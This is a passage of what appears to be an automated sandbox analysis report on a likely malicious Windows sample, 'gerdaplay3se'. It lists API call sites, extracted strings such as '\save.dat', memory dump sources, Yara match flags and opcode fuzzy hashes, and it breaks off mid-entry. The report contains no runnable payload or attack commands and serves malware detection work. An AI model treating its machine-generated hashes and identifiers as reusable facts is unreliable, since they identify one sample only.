                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: Free$Virtual$Heap
                                                                                  • String ID: -@
                                                                                  • API String ID: 2016334554-2999422947
                                                                                  • Opcode ID: 9c389c61e5a6cd43db9238f188d86346d40478f5c1fa1013f45f36ce2e9b1707
                                                                                  • Instruction ID: d55dda63c6158a3f001c35490e62a79414290c04420ce97baa52a0c06dad31a7
                                                                                  • Opcode Fuzzy Hash: 9c389c61e5a6cd43db9238f188d86346d40478f5c1fa1013f45f36ce2e9b1707
                                                                                  • Instruction Fuzzy Hash: D1B16C75A00205DFDB24CF04CA90AA9BBB1FB88314F24C1AED9196F396C735EE41CB84
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AdjustPointer_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 1721217611-0
                                                                                  • Opcode ID: 6031f670ab57bf863635bc97f2b3dfc07fbbe0f9a9d893e57def7090a14211b0
                                                                                  • Instruction ID: 89d38d1b3fac3c21218e0dcf11fce7d5b7db7373426569c4fbec444f0f238a69
                                                                                  • Opcode Fuzzy Hash: 6031f670ab57bf863635bc97f2b3dfc07fbbe0f9a9d893e57def7090a14211b0
                                                                                  • Instruction Fuzzy Hash: BE41A1362143029EEB346F64D850B7A33E6EF01718F14446FE889863E0FB29FD85DA21
                                                                                  APIs
                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02D64149), ref: 02D712FF
                                                                                    • Part of subcall function 02D63FDC: __EH_prolog.LIBCMT ref: 02D63FE1
                                                                                    • Part of subcall function 02D63FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02D63FF3
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D712F4
                                                                                  • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02D64149), ref: 02D71340
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02D64149), ref: 02D71411
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$Event$CreateH_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 2825413587-0
                                                                                  • Opcode ID: ef7a9c383efb53d8ab225c4df7abe22ecc1ec39e27bb36698856f35c8c262113
                                                                                  • Instruction ID: 553480ad1861e06c2443cc8918b2d61bdd5c770092fede61c1f97bde9ef62846
                                                                                  • Opcode Fuzzy Hash: ef7a9c383efb53d8ab225c4df7abe22ecc1ec39e27bb36698856f35c8c262113
                                                                                  • Instruction Fuzzy Hash: 9C517D756007458BDB21DF28C88479ABBE5FF48328F294728E8AD97390E739DC05CB91
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 2782032738-0
                                                                                  • Opcode ID: acdac2ea7175f400f5f91947118356792f48efd8ea4696cdf33623925e283fbc
                                                                                  • Instruction ID: 988be52a7df488a428a64fdc9d24bc80171aa55d720251e2ce29d61c29c7f9b9
                                                                                  • Opcode Fuzzy Hash: acdac2ea7175f400f5f91947118356792f48efd8ea4696cdf33623925e283fbc
                                                                                  • Instruction Fuzzy Hash: A84104B6A00706ABDB988F69C8C05AE7BB6EF40364B1082BDE855C7380F778DD41DB50
                                                                                  APIs
                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02D7FE8B
                                                                                  • __isleadbyte_l.LIBCMT ref: 02D7FEB9
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 02D7FEE7
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 02D7FF1D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                  • String ID:
                                                                                  • API String ID: 3058430110-0
                                                                                  • Opcode ID: d2d10dd5f8c23480bce000bc7ffdbbde52f7fdb2b30e1d9af8e6e714658ac66f
                                                                                  • Instruction ID: 2938a1dac503f1ea3f8d36ad1389e5b912d632d3718505526e3e3f365b56c070
                                                                                  • Opcode Fuzzy Hash: d2d10dd5f8c23480bce000bc7ffdbbde52f7fdb2b30e1d9af8e6e714658ac66f
                                                                                  • Instruction Fuzzy Hash: 8531A131604246AFDB318F65CC44BBABBA9FF41324F154568E86887AD1F734DC51CBA0
                                                                                  APIs
                                                                                  • VirtualFree.KERNEL32(FFFFFFFF,00001000,00004000,7622DFF0,?,00000000,?,-@,0040490E,00000010,00402FA3,?,?), ref: 004047F0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeVirtual
                                                                                  • String ID: -@$r@$r@
                                                                                  • API String ID: 1263568516-1251997348
                                                                                  • Opcode ID: db728298b98a3dab2ecdb4dab480861bd9016d5beafec50a15f5b98851f5bcbc
                                                                                  • Instruction ID: a63ca1888fca441bf056fbcf5d5deb39584b298cc2094c54b415f4e68fc1e946
                                                                                  • Opcode Fuzzy Hash: db728298b98a3dab2ecdb4dab480861bd9016d5beafec50a15f5b98851f5bcbc
                                                                                  • Instruction Fuzzy Hash: EE21A1B66003419BDB20AB24DD4476633A4EB81379F24CA3BDB65B66D0D378E941CB58
                                                                                  APIs
                                                                                  • htons.WS2_32(?), ref: 02D63DA2
                                                                                    • Part of subcall function 02D63BD3: __EH_prolog.LIBCMT ref: 02D63BD8
                                                                                    • Part of subcall function 02D63BD3: std::bad_exception::bad_exception.LIBCMT ref: 02D63BED
                                                                                  • htonl.WS2_32(00000000), ref: 02D63DB9
                                                                                  • htonl.WS2_32(00000000), ref: 02D63DC0
                                                                                  • htons.WS2_32(?), ref: 02D63DD4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                                  • String ID:
                                                                                  • API String ID: 3882411702-0
                                                                                  • Opcode ID: a2a63c57e4ae5ffd123ef968d59c33b83bafa4580da39bfd2ced241a79cf601b
                                                                                  • Instruction ID: 197a980cd73b0a0ed2b491e052740e4768c386e9ef72879a695eb9b6e8cffafe
                                                                                  • Opcode Fuzzy Hash: a2a63c57e4ae5ffd123ef968d59c33b83bafa4580da39bfd2ced241a79cf601b
                                                                                  • Instruction Fuzzy Hash: EB117035910209EBDF019F64D889A6AB7B9EF09710F108496FC04DF345D6719E14CBA1
                                                                                  APIs
                                                                                  • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02D623D0
                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02D623DE
                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D62401
                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02D62408
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                  • String ID:
                                                                                  • API String ID: 4018804020-0
                                                                                  • Opcode ID: a52abba82188cbbfc97c4d097ef033afd8ac13f974bef01c4a83db573e99ba27
                                                                                  • Instruction ID: 87ac632aeaa4245b6f2ae818c5558134c4a6d1c70b24f96c04c67e56ca101ab5
                                                                                  • Opcode Fuzzy Hash: a52abba82188cbbfc97c4d097ef033afd8ac13f974bef01c4a83db573e99ba27
                                                                                  • Instruction Fuzzy Hash: 6511CE31A10204ABEB109F60DC88B76BBB8FF50709F24446DE9019B640E7B1FD11CBA0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                  • String ID:
                                                                                  • API String ID: 3016257755-0
                                                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                  • Instruction ID: 39d247dd303399480e88bdfda03b7bfd51642aad8d0397ed9daa7d49bcb167f4
                                                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                  • Instruction Fuzzy Hash: 6601107201014EBFCF225E84CC418EE3F67BB18354F488416FA5859231E73AC9B1EB91
                                                                                  APIs
                                                                                  • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D624A9
                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02D624B8
                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D624CD
                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02D624D4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                  • String ID:
                                                                                  • API String ID: 4018804020-0
                                                                                  • Opcode ID: b1b6a859db04ede1f36d750810872672e035261a74a52555616072a243cd3e47
                                                                                  • Instruction ID: 537e2ed4b1041d159894869700e17c65fa300da7415cf63d37cd52a3bb181144
                                                                                  • Opcode Fuzzy Hash: b1b6a859db04ede1f36d750810872672e035261a74a52555616072a243cd3e47
                                                                                  • Instruction Fuzzy Hash: 23F03C76540205AFEB009F69EC48FAABBBCFF54711F204429FA05DA241D771E960CFA0
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D62009
                                                                                  • RtlDeleteCriticalSection.NTDLL(?), ref: 02D62028
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D62037
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D6204E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                                  • String ID:
                                                                                  • API String ID: 2456309408-0
                                                                                  • Opcode ID: 638142d3319d9e77140b9e1ab51779761895410c89b23a0524ac2b82aef17b62
                                                                                  • Instruction ID: 579005bf0faaaccdacf7d839cf71f1e2c921887477b73e0baf87a413213d095a
                                                                                  • Opcode Fuzzy Hash: 638142d3319d9e77140b9e1ab51779761895410c89b23a0524ac2b82aef17b62
                                                                                  • Instruction Fuzzy Hash: 6D01A9318006049BD334AFA4E90C7AABBB5FF04708F204A5DE84692790CBB46D48CF60
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Event$H_prologSleep
                                                                                  • String ID:
                                                                                  • API String ID: 1765829285-0
                                                                                  • Opcode ID: 27aec824736060dd5848c4d87b9c5daab82b677e594bd1a313092ecc8e2b6162
                                                                                  • Instruction ID: abbd0be2777b8da41a974a654c5ddd58b9778c8ad2f8e4562a5d73c525883cc0
                                                                                  • Opcode Fuzzy Hash: 27aec824736060dd5848c4d87b9c5daab82b677e594bd1a313092ecc8e2b6162
                                                                                  • Instruction Fuzzy Hash: ECF03A76650110EFDB00AFA4E8C8B88BBB4FF09321F6081A9FA199B390C7759C54CB61
                                                                                  APIs
                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,r@,0040485C,r@,7622DFF0,?,00000000,?,-@,0040490E,00000010,00402FA3), ref: 0040476B
                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 004047A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: Free$HeapVirtual
                                                                                  • String ID: r@$r@
                                                                                  • API String ID: 3783212868-1712950306
                                                                                  • Opcode ID: 615be266f2133a35edff91ca5e545c140f31fce35e26d2f64644c01e7612d901
                                                                                  • Instruction ID: 9f28707f468f96f8ba01f1c404cbd9d3f6c084a3717c71e7c0065962692db169
                                                                                  • Opcode Fuzzy Hash: 615be266f2133a35edff91ca5e545c140f31fce35e26d2f64644c01e7612d901
                                                                                  • Instruction Fuzzy Hash: C6F01774544210DFC3248F08EE08A427BA0FB88720B11867EF996672E1C371AC50CF88
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog_memmove
                                                                                  • String ID: &'
                                                                                  • API String ID: 3529519853-655172784
                                                                                  • Opcode ID: a12ec99faca517ecfa6097741f95eb97d2cb0f2fb9c87dfd81ca8a2e2782517d
                                                                                  • Instruction ID: 7bf130f485e252087f7ba3fbc41184dbdabff7997c15efeceb0853228b4b2e08
                                                                                  • Opcode Fuzzy Hash: a12ec99faca517ecfa6097741f95eb97d2cb0f2fb9c87dfd81ca8a2e2782517d
                                                                                  • Instruction Fuzzy Hash: 93615B71D012199FDF21EFA4C998AEDBBB6EF48310F11416AD405BB290E7709E45CBA1
                                                                                  APIs
                                                                                  • GetCPInfo.KERNEL32(?,00000000), ref: 00404ED1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: Info
                                                                                  • String ID: $
                                                                                  • API String ID: 1807457897-3032137957
                                                                                  • Opcode ID: ade2e129719512a706aeac876f0a8c01095c6a06ec5d81e25aee3eb1febfb5f9
                                                                                  • Instruction ID: e64d793a5bd47a750bf71bc710b27f1b951018593c94bf49e3c2bba34da37a12
                                                                                  • Opcode Fuzzy Hash: ade2e129719512a706aeac876f0a8c01095c6a06ec5d81e25aee3eb1febfb5f9
                                                                                  • Instruction Fuzzy Hash: 1D416B710142985EEB169714CE59FEB3FE8EB02704F1404F6DA49F61D2C2794924DBBB
                                                                                  APIs
                                                                                  • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02D6830A,?,?,00000000), ref: 02D69607
                                                                                  • getsockname.WS2_32(?,?,?), ref: 02D6961D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastgetsockname
                                                                                  • String ID: &'
                                                                                  • API String ID: 566540725-655172784
                                                                                  • Opcode ID: 10ac9c37f9e4f1d8b0c75f38b830b7b89c2340109692e044f40a6a9f32ae2ae8
                                                                                  • Instruction ID: b54001aa34fdbd65fff4ea53b98ea7fd91c002377f448f45052014e62b6ae5a5
                                                                                  • Opcode Fuzzy Hash: 10ac9c37f9e4f1d8b0c75f38b830b7b89c2340109692e044f40a6a9f32ae2ae8
                                                                                  • Instruction Fuzzy Hash: 9D215176A04248DBDB10DFA8D845ADEB7F5FF48324F10856AE918EB380E734ED458B61
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D6CBEB
                                                                                    • Part of subcall function 02D6D1C7: std::exception::exception.LIBCMT ref: 02D6D1F6
                                                                                    • Part of subcall function 02D6D97D: __EH_prolog.LIBCMT ref: 02D6D982
                                                                                    • Part of subcall function 02D73A8F: _malloc.LIBCMT ref: 02D73AA7
                                                                                    • Part of subcall function 02D6D226: __EH_prolog.LIBCMT ref: 02D6D22B
                                                                                  Strings
                                                                                  • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D6CC28
                                                                                  • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02D6CC21
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog$_mallocstd::exception::exception
                                                                                  • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                                  • API String ID: 1953324306-1943798000
                                                                                  • Opcode ID: aade798ca4dd73a47c23e8632467407a8e8fd026e458a0050e0b3db751b997a4
                                                                                  • Instruction ID: 6924ffef5a9e2782c8ad8241b7f3561bbe353a7fe816803e30aa6ac61373037d
                                                                                  • Opcode Fuzzy Hash: aade798ca4dd73a47c23e8632467407a8e8fd026e458a0050e0b3db751b997a4
                                                                                  • Instruction Fuzzy Hash: FE218071E052449BDB14EFE4E958AFEBBBAEF15704F00405EE845AB380DB705E44CBA1
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 02D6535D
                                                                                    • Part of subcall function 02D72EEC: __FF_MSGBANNER.LIBCMT ref: 02D72F03
                                                                                    • Part of subcall function 02D72EEC: __NMSG_WRITE.LIBCMT ref: 02D72F0A
                                                                                    • Part of subcall function 02D72EEC: RtlAllocateHeap.NTDLL(00790000,00000000,00000001), ref: 02D72F2F
                                                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 02D6536F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                                  • String ID: \save.dat
                                                                                  • API String ID: 4128168839-3580179773
                                                                                  • Opcode ID: 32e84d67a6cca73b763006a819898044a222edb626688371c48aec68f40292fe
                                                                                  • Instruction ID: eec6cc9a0751c8c81f9324a3d5251cac44b3caadba7141ee21616fe6b666a7cd
                                                                                  • Opcode Fuzzy Hash: 32e84d67a6cca73b763006a819898044a222edb626688371c48aec68f40292fe
                                                                                  • Instruction Fuzzy Hash: E1117A329042406BEB259E759C84D7FFF6BDF82A50B1401A9E8846B342E7A20D02C6B0
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D6396A
                                                                                  • std::runtime_error::runtime_error.LIBCPMT ref: 02D639C1
                                                                                    • Part of subcall function 02D61410: std::exception::exception.LIBCMT ref: 02D61428
                                                                                    • Part of subcall function 02D6A555: __EH_prolog.LIBCMT ref: 02D6A55A
                                                                                    • Part of subcall function 02D6A555: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D6A569
                                                                                    • Part of subcall function 02D6A555: __CxxThrowException@8.LIBCMT ref: 02D6A588
                                                                                  Strings
                                                                                  • Day of month is not valid for year, xrefs: 02D639AC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                  • String ID: Day of month is not valid for year
                                                                                  • API String ID: 1404951899-1521898139
                                                                                  • Opcode ID: a94dbd409c2e66012ce37706d0afc85f5c9b076271fdf86d87f95e7d0eb3a5f8
                                                                                  • Instruction ID: c309ea89aa96fa48e26fddadc4094b0a9b8abfa62f3008be0bd05309ea3b42bd
                                                                                  • Opcode Fuzzy Hash: a94dbd409c2e66012ce37706d0afc85f5c9b076271fdf86d87f95e7d0eb3a5f8
                                                                                  • Instruction Fuzzy Hash: A9015E76914209ABDB04FFA4D809AFEB779FF14710F40801AEC04A7740EB709E55CBA5
                                                                                  APIs
                                                                                  • std::exception::exception.LIBCMT ref: 02D6FA4E
                                                                                  • __CxxThrowException@8.LIBCMT ref: 02D6FA63
                                                                                    • Part of subcall function 02D73A8F: _malloc.LIBCMT ref: 02D73AA7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                  • String ID: bad allocation
                                                                                  • API String ID: 4063778783-2104205924
                                                                                  • Opcode ID: 2bf8285e1d08a95dce85e288b7f639f4c3f7472fb322c0d9db85dacb32e57000
                                                                                  • Instruction ID: f00ffde967f06b43814e0cf78bd9fd0f3efd106a130e512ef1a9e95c8eb85870
                                                                                  • Opcode Fuzzy Hash: 2bf8285e1d08a95dce85e288b7f639f4c3f7472fb322c0d9db85dacb32e57000
                                                                                  • Instruction Fuzzy Hash: 10F0E97160430D5BDF04EA9499099BF77ACEB00305F900566A521F2781EB70EE048560
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D63C1B
                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 02D63C30
                                                                                    • Part of subcall function 02D723F7: std::exception::exception.LIBCMT ref: 02D72401
                                                                                    • Part of subcall function 02D6A58E: __EH_prolog.LIBCMT ref: 02D6A593
                                                                                    • Part of subcall function 02D6A58E: __CxxThrowException@8.LIBCMT ref: 02D6A5BC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                  • String ID: bad cast
                                                                                  • API String ID: 1300498068-3145022300
                                                                                  • Opcode ID: 59ba2e9933879fc19bdab4a2f6f7ec6438a9668768be4ea393d9925b8c60ae12
                                                                                  • Instruction ID: 68ee620a4fe708bc6da29705dd117dc52c766385e79f118873ea3ed4c672d335
                                                                                  • Opcode Fuzzy Hash: 59ba2e9933879fc19bdab4a2f6f7ec6438a9668768be4ea393d9925b8c60ae12
                                                                                  • Instruction Fuzzy Hash: BDF0E5729001048BC709EF58E444AEAB776EF52711F5040AEFD065B390CB72DE4ACBE1
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D638D2
                                                                                  • std::runtime_error::runtime_error.LIBCPMT ref: 02D638F1
                                                                                    • Part of subcall function 02D61410: std::exception::exception.LIBCMT ref: 02D61428
                                                                                    • Part of subcall function 02D688C3: _memmove.LIBCMT ref: 02D688E3
                                                                                  Strings
                                                                                  • Year is out of valid range: 1400..10000, xrefs: 02D638E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                  • String ID: Year is out of valid range: 1400..10000
                                                                                  • API String ID: 3258419250-2344417016
                                                                                  • Opcode ID: 64368eeffd35e03e2057b1cdc29b2a7daf4c9ee032fa689c223cc36bb65d0fd6
                                                                                  • Instruction ID: ccd91f3acafac8a8bc4ffd15f1859b7a8b48a92168b5c3a2d55c28e00623281c
                                                                                  • Opcode Fuzzy Hash: 64368eeffd35e03e2057b1cdc29b2a7daf4c9ee032fa689c223cc36bb65d0fd6
                                                                                  • Instruction Fuzzy Hash: C7E0D872E4410497E714FFD89815BFDB776DB08B10F40044AD401A77C0DAB22D18CBA5
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D63886
                                                                                  • std::runtime_error::runtime_error.LIBCPMT ref: 02D638A5
                                                                                    • Part of subcall function 02D61410: std::exception::exception.LIBCMT ref: 02D61428
                                                                                    • Part of subcall function 02D688C3: _memmove.LIBCMT ref: 02D688E3
                                                                                  Strings
                                                                                  • Day of month value is out of range 1..31, xrefs: 02D63894
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                  • String ID: Day of month value is out of range 1..31
                                                                                  • API String ID: 3258419250-1361117730
                                                                                  • Opcode ID: 35c68124a36035b7671b7f16c95fdd103af46bc07e181b62cddc6c106e2ffca6
                                                                                  • Instruction ID: 2ed07a54e20712f9054e95a94a7d5e9e8c04b9e7d48ef305eb4acc494bf6e24f
                                                                                  • Opcode Fuzzy Hash: 35c68124a36035b7671b7f16c95fdd103af46bc07e181b62cddc6c106e2ffca6
                                                                                  • Instruction Fuzzy Hash: 44E0D872E0010497E714BFD4D815BFDB776DB08B10F40044AD401B37C0DAB12D148BE5
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D6391E
                                                                                  • std::runtime_error::runtime_error.LIBCPMT ref: 02D6393D
